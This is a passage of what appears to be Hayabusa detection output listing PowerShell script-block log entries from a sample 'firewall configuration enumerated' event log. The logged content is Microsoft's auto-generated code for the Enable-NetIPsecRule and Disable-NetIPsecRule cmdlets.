-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecRule' function 
Disable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] 
[ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] 
[ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(Par",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper 
$__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 
'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 
'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,", ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
